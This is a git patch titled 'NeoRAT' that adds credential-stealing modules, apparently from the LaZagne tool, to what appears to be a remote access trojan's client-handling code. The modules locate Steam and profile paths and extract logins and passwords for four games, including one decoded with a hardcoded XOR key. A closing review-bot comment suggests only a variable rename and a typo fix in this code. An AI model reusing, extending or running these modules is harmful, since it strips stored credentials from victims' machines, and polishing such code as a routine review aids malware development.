From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT
---
 .../lazagne/softwares/games/__init__.py | 0
 .../lazagne/softwares/games/galconfusion.py | 55 ++++++++++++++++++++++
 .../lazagne/softwares/games/kalypsomedia.py | 42 +++++++++++++++++
 .../lazagne/softwares/games/roguestale.py | 41 ++++++++++++++++
 .../lazagne/softwares/games/turba.py | 55 ++++++++++++++++++++++
 5 files changed, 193 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/games/__init__.py
 create mode 100644 foreign/client_handling/lazagne/softwares/games/galconfusion.py
 create mode 100644 foreign/client_handling/lazagne/softwares/games/kalypsomedia.py
 create mode 100644 foreign/client_handling/lazagne/softwares/games/roguestale.py
 create mode 100644 foreign/client_handling/lazagne/softwares/games/turba.py
(limited to 'foreign/client_handling/lazagne/softwares/games')
diff --git a/foreign/client_handling/lazagne/softwares/games/__init__.py b/foreign/client_handling/lazagne/softwares/games/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/foreign/client_handling/lazagne/softwares/games/galconfusion.py b/foreign/client_handling/lazagne/softwares/games/galconfusion.py
new file mode 100644
index 0000000..b4279c5
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/games/galconfusion.py
@@ -0,0 +1,55 @@
+# -*- coding: utf-8 -*-
+
+import os
+
+try:
+ import _winreg as winreg
+except ImportError:
+ import winreg
+
+import foreign.client_handling.lazagne.config.winstructure as win
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import string_to_unicode
+
+
+class GalconFusion(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'galconfusion', 'games', registry_used=True)
+
+ def run(self):
+ creds = []
+ results = None
+
+ # Find the location of steam - to make it easier we're going to use a try block
+ # 'cos I'm lazy
+ try:
+ with win.OpenKey(win.HKEY_CURRENT_USER, 'Software\\Valve\\Steam') as key:
+ results = winreg.QueryValueEx(key, 'SteamPath')
+ except Exception:
+ pass
+
+ if results:
+ steampath = string_to_unicode(results[0])
+ userdata = os.path.join(steampath, u'userdata')
+
+ # Check that we have a userdata directory
+ if not os.path.exists(userdata):
+ self.error(u'Steam doesn\'t have a userdata directory.')
+ return
+
+ # Now look for Galcon Fusion in every user
+ for f in os.listdir(userdata):
+ filepath = os.path.join(userdata, string_to_unicode(f), u'44200\\remote\\galcon.cfg')
+ if not os.path.exists(filepath):
+ continue
+
+ # If we're here we should have a Galcon Fusion file
+ with open(filepath, mode='rb') as cfgfile:
+ # We've found a config file, now extract the creds
+ data = cfgfile.read()
+ creds.append({
+ 'Login': data[4:0x23],
+ 'Password': data[0x24:0x43]
+ })
+
+ return creds
diff --git a/foreign/client_handling/lazagne/softwares/games/kalypsomedia.py b/foreign/client_handling/lazagne/softwares/games/kalypsomedia.py
new file mode 100644
index 0000000..566aba7
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/games/kalypsomedia.py
@@ -0,0 +1,42 @@
+# -*- coding: utf-8 -*-
+import base64
+import os
+
+from foreign.client_handling.lazagne.config.constant import constant
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import char_to_int, chr_or_byte
+
+try:
+ from ConfigParser import ConfigParser # Python 2.7
+except ImportError:
+ from configparser import ConfigParser # Python 3
+
+
+class KalypsoMedia(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'kalypsomedia', 'games')
+
+ def xorstring(self, s, k):
+ """
+ xors the two strings
+ """
+ return b''.join(chr_or_byte(char_to_int(x) ^ char_to_int(y)) for x, y in zip(s, k))
+
+ def run(self):
+ creds = []
+ key = b'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89'
+ inifile = os.path.join(constant.profile['APPDATA'], u'Kalypso Media\\Launcher\\launcher.ini')
+
+ # The actual user details are stored in *.userdata files
+ if os.path.exists(inifile):
+ config = ConfigParser()
+ config.read(inifile)
+
+ # get the encoded password
+ cookedpw = base64.b64decode(config.get('styx user', 'password'))
+
+ creds.append({
+ 'Login': config.get('styx user', 'login'),
+ 'Password': self.xorstring(cookedpw, key)
+ })
+ return creds
diff --git a/foreign/client_handling/lazagne/softwares/games/roguestale.py b/foreign/client_handling/lazagne/softwares/games/roguestale.py
new file mode 100644
index 0000000..ded16eb
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/games/roguestale.py
@@ -0,0 +1,41 @@
+# -*- coding: utf-8 -*-
+import os
+import re
+from xml.etree.cElementTree import ElementTree
+
+from foreign.client_handling.lazagne.config.constant import constant
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+
+
+class RoguesTale(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'roguestale', 'games')
+
+ def run(self):
+ creds = []
+ directory = constant.profile['USERPROFILE'] + u'\\Documents\\Rogue\'s Tale\\users'
+
+ # The actual user details are stored in *.userdata files
+ if os.path.exists(directory):
+ files = os.listdir(directory)
+
+ for f in files:
+ if re.match('.*\.userdata', f):
+ # We've found a user file, now extract the hash and username
+
+ xmlfile = directory + '\\' + f
+ tree = ElementTree(file=xmlfile)
+ root = tree.getroot()
+
+ # Double check to make sure that the file is valid
+ if root.tag != 'user':
+ self.warning(u'Profile %s does not appear to be valid' % f)
+ continue
+
+ # Now save it to credentials
+ creds.append({
+ 'Login': root.attrib['username'],
+ 'Hash': root.attrib['password']
+ })
+
+ return creds
diff --git a/foreign/client_handling/lazagne/softwares/games/turba.py b/foreign/client_handling/lazagne/softwares/games/turba.py
new file mode 100644
index 0000000..f3604a8
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/games/turba.py
@@ -0,0 +1,55 @@
+# -*- coding: utf-8 -*-
+
+import os
+
+try:
+ import _winreg as winreg
+except ImportError:
+ import winreg
+
+import foreign.client_handling.lazagne.config.winstructure as win
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import string_to_unicode
+
+
+class Turba(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'turba', 'games', registry_used=True)
+
+ def run(self):
+ creds = []
+ results = None
+
+ # Find the location of steam - to make it easier we're going to use a try block
+ # 'cos I'm lazy
+ try:
+ with win.OpenKey(win.HKEY_CURRENT_USER, 'Software\Valve\Steam') as key:
+ results = winreg.QueryValueEx(key, 'SteamPath')
+ except Exception:
+ pass
+
+ if results:
+ steampath = string_to_unicode(results[0])
+ steamapps = os.path.join(steampath, u'SteamApps\common')
+
+ # Check that we have a SteamApps directory
+ if not os.path.exists(steamapps):
+ self.error(u'Steam doesn\'t have a SteamApps directory.')
+ return
+
+ filepath = os.path.join(steamapps, u'Turba\\Assets\\Settings.bin')
+
+ if not os.path.exists(filepath):
+ self.debug(u'Turba doesn\'t appear to be installed.')
+ return
+
+ # If we're here we should have a valid config file file
+ with open(filepath, mode='rb') as filepath:
+ # We've found a config file, now extract the creds
+ data = filepath.read()
+ chunk = data[0x1b:].split('\x0a')
+ creds.append({
+ 'Login': chunk[0],
+ 'Password': chunk[1]
+ })
+ return creds
-- cgit v1.2.3
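Review bot: In Turba.run(), `with open(filepath, mode='rb') as filepath:` rebinds the name that held the path to the open file object, so `filepath` means a path in the `os.path.exists(filepath)` check three lines earlier and a handle in `data = filepath.read()` right after, which reads confusingly and makes the surrounding comments ("valid config file") ambiguous about what the name refers to. The sibling module galconfusion.py in this same commit uses a separate name for the handle; matching it here keeps the two files consistent: `with open(filepath, mode='rb') as cfgfile:` and `data = cfgfile.read()`. The same comment line also has a duplicated word, `# If we're here we should have a valid config file file`, which should read `# If we're here we should have a valid config file`.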